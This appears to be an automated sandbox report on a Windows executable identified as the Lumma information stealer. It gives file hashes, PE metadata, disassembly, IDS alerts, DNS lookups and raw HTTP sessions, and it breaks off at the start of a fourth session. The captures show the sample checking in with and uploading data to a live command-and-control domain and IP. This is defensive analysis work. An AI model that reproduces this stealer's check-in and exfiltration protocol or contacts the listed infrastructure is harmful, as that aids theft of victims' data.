00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | external.exe, 00000002.00000003.1725467175.0000000003535000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wordyfindy.lat:443/apiion.txtPK | external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.19.35 | wordyfindy.lat | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579555
Start date and time: 2024-12-23 00:11:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: external.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/1@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 47
• Number of non-executed functions: 78
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
18:11:58 | API Interceptor | 9x Sleep call for process: external.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.19.35 | http://qwasdrgqwdasd.winbestprizess.info/palasekddq2hf45ysm.js | Get hash | malicious | Unknown | Browse |
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | Loader.exe | Get hash | malicious | RHADAMANTHYS | Browse | • 172.64.41.3
CLOUDFLARENETUS | Launcher.exe | Get hash | malicious | LummaC | Browse | • 104.21.66.86
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | • 172.67.151.193
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | • 172.67.191.144
CLOUDFLARENETUS | Full_Ver_Setup.exe | Get hash | malicious | LummaC | Browse | • 104.21.63.229
CLOUDFLARENETUS | loligang.sh4.elf | Get hash | malicious | Mirai | Browse | • 162.158.254.178
CLOUDFLARENETUS | winwidgetshp.mp4.hta | Get hash | malicious | LummaC | Browse | • 104.21.18.182
CLOUDFLARENETUS | https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/ | Get hash | malicious | HTMLPhisher | Browse | • 104.21.234.144
CLOUDFLARENETUS | nshkppc.elf | Get hash | malicious | Mirai | Browse | • 104.24.135.181
CLOUDFLARENETUS | swift-bootstrapper.exe | Get hash | malicious | Unknown | Browse | • 104.18.38.10
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | Launcher.exe | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | Wave-Executor.exe | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | Full_Ver_Setup.exe | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | winwidgetshp.mp4.hta | Get hash | malicious | LummaC | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | • 104.21.19.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | • 104.21.19.35
No context
Process: C:\Users\user\Desktop\external.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:L:L
MD5: 7B8B965AD4BCA0E41AB51DE7B31363A1
SHA1: D1854CAE891EC7B29161CCAF79A24B00C274BDAA
SHA-256: 1B16B1DF538BA12DC3F97EDBB85CAA7050D46C148134290FEBA80F8236C83DB9
SHA-512: 917148EC47923F2E0E3D73142AC4F94EC4C73078865BA6D29F0EA172CD6F4BF34DB699AF5C33535D3694D4AEF91A11F916004D0382F794448A8550623D34C985
Malicious: false
Reputation: low
Preview: n
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.513055401926001
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: external.exe
File size: 564'224 bytes
MD5: 88cd76e4609e50c6435ebc4771427d2c
SHA1: e86ece49d9d75aebf84e82ba5886014d2a6e302e
SHA256: 42011c4da8ac276fb88efb72aacf717bc57878f5e9a70b9994e4c224c46800bd
SHA512: caf707d10213469be757665c13b3233250a609096e9b5492e136b93146bcb1c1e473c82d52c1c643f703838f7b00cbc80f90d6448c35a282d468656bf181fe77
SSDEEP: 12288:gRIomkRJWzi7X+UeyZAHoX+Rmo/RE1rKIwx6:ge/kRJWzib+UnAHoX+Rmo/RCrLw
TLSH: 71C4D1117550C073DD6721B364BADB6A462DFA200B626ACFA7480DBDDF352C1AB31B27
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.................................Z.....@.....................................<..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4170bb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp: 0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 1f5f01fd52677b24724028ad24992aa9
Instruction
call 00007F6AF952DB6Ah
jmp 00007F6AF952D9D9h
mov ecx, dword ptr [00440700h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F6AF952DB66h
test esi, ecx
jne 00007F6AF952DB88h
call 00007F6AF952DB91h
mov ecx, eax
cmp ecx, edi
jne 00007F6AF952DB69h
mov ecx, BB40E64Fh
jmp 00007F6AF952DB70h
test esi, ecx
jne 00007F6AF952DB6Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00440700h], ecx
not ecx
pop edi
mov dword ptr [00440740h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0043D914h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0043D8CCh]
xor dword ptr [ebp-04h], eax
call dword ptr [0043D8C8h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0043D964h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00441E50h
call dword ptr [0043D93Ch]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F6AF9535198h
add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d6b4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x3e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x44000 | 0x2324 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x39968 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35cf8 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3d860 | 0x170 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x326cc | 0x32800 | ccc71f71555262d04b28eeb13f33c694 | False | 0.5078125 | data | 6.449171689149143 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x34000 | 0xad9c | 0xae00 | 265ca2e098c45dacae5fa86d5b3aa7cb | False | 0.4167789152298851 | locale data table | 4.866718139159974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3f000 | 0x3618 | 0x2600 | 34a18fbac611bd450c331e8e8b0fc570 | False | 0.31270559210526316 | data | 5.125689677633356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x43000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x44000 | 0x2324 | 0x2400 | a5356144ed5fdf31d774488bfaa21264 | False | 0.7392578125 | data | 6.496424389763303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x47000 | 0x47000 | 0x47000 | 3012423acc5a2286fca531663b8ae4f8 | False | 1.0003301056338028 | OpenPGP Secret Key | 7.999411323179124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x8e000 | 0x3e8 | 0x400 | 35e84f3f24c06d757c32542e07bb3560 | False | 0.43359375 | data | 3.2859175893892143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8e058 | 0x390 | data | English | United States | 0.4517543859649123
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | DefWindowProcW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T00:11:58.949369+0100 | 2058212 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) | 1 | 192.168.2.4 | 56647 | 1.1.1.1 | 53 | UDP
2024-12-23T00:12:00.721501+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:01.470847+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:01.470847+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:02.708743+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:03.527568+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:03.527568+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:05.137214+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:18.646834+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:20.849251+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:23.461200+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:24.539100+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49740 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:26.189139+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:30.898745+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.19.35 | 443 | TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 00:11:58.949368954 CET | 56647 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:11:59.163374901 CET | 53 | 56647 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:11:59.166223049 CET | 50389 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:11:59.485234976 CET | 53 | 50389 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 00:11:58.949368954 CET | 192.168.2.4 | 1.1.1.1 | 0x2da0 | Standard query (0) | bellflamre.click | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:11:59.166223049 CET | 192.168.2.4 | 1.1.1.1 | 0x8c51 | Standard query (0) | wordyfindy.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 00:11:59.163374901 CET | 1.1.1.1 | 192.168.2.4 | 0x2da0 | Name error (3) | bellflamre.click | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:11:59.485234976 CET | 1.1.1.1 | 192.168.2.4 | 0x8c51 | No error (0) | wordyfindy.lat |  | 104.21.19.35 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:11:59.485234976 CET | 1.1.1.1 | 192.168.2.4 | 0x8c51 | No error (0) | wordyfindy.lat |  | 172.67.184.241 | A (IP address) | IN (0x0001) | false
• wordyfindy.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:12:00 UTC | 261 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: wordyfindy.lat
2024-12-22 23:12:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-22 23:12:01 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 23:12:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=i5257h27l40f20djlb9seueveh; expires=Thu, 17 Apr 2025 16:58:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsqYOztu1%2FnTlfBuWFpNpZGFfCV8RYWLrHkoWlZYTpGNvN9fZSyxvYjvb07W32iHlQpZJj5p7BsDcjDpGyuLe7y3jJ06Hn%2FcaUQSIg9z9GKkyeVB%2B3HDnhm0N1LyFNlTeg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f63cb563cf70f47-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1534&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1903520&cwnd=223&unsent_bytes=0&cid=d6c0c6d01f51527a&ts=767&x=0"
2024-12-22 23:12:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-22 23:12:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:12:02 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 54
Host: wordyfindy.lat
2024-12-22 23:12:02 UTC | 54 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--alaeljhsfdmg&j=
2024-12-22 23:12:03 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 23:12:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=v8ulgol9qn9ur6j7tb4jdjl3q2; expires=Thu, 17 Apr 2025 16:58:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFtN7agBvBmIsSdhr%2FuvhMuMlIl3OZW9Du0UZA%2B0HB0w5FCIfZ1FnhfyR%2BVNd6%2B2BxPI9Sb95xaOZoLjB4RqmnbYBvR27R4vipD70%2FM55KoxMoc4myR6QEiqo1bwnHAhLA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f63cb62bacf42c3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1711&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=952&delivery_rate=1706604&cwnd=203&unsent_bytes=0&cid=5fdf5ba964734aa6&ts=826&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:12:05 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XQ441IQ67QVVKRAZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18158
Host: wordyfindy.lat
2024-12-22 23:12:05 UTC | 15331 | OUT | Data Raw: 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d
Data Ascii: --XQ441IQ67QVVKRAZContent-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--XQ441IQ67QVVKRAZContent-Disposition: form-data; name="pid"2--XQ441IQ67QVVKRAZContent-Disposition: form-data; name="lid"LPnhqo--alaeljhsfdm
2024-12-22 23:12:17 UTC | 1141 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 23:12:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fcahehvst29f6kr8bcvl0shc5c; expires=Thu, 17 Apr 2025 16:58:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHzOdWIsKEqHsh%2B2JkUzw53q90MA%2Fv%2BA9aN5iN%2Bhcv%2Br3MAgjTV0ImWl8ev%2FT0FcQnhp68JDoXNPIyu6E7Bdb5AfYUzPqLjXxMdCMuZT0j6bwlZ3XMgAfBA%2BAIwE58T7%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f63cb712ae843f3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1713&rtt_var=652&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19116&delivery_rate=1666666&cwnd=204&unsent_bytes=0&cid=cd514e6f26c5145e&ts=12175&x=0"
2024-12-22 23:12:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 23:12:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        3 | 192.168.2.4 | 49735 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-22 23:12:18 UTC | 279 | OUT | POST /api HTTP/1.1
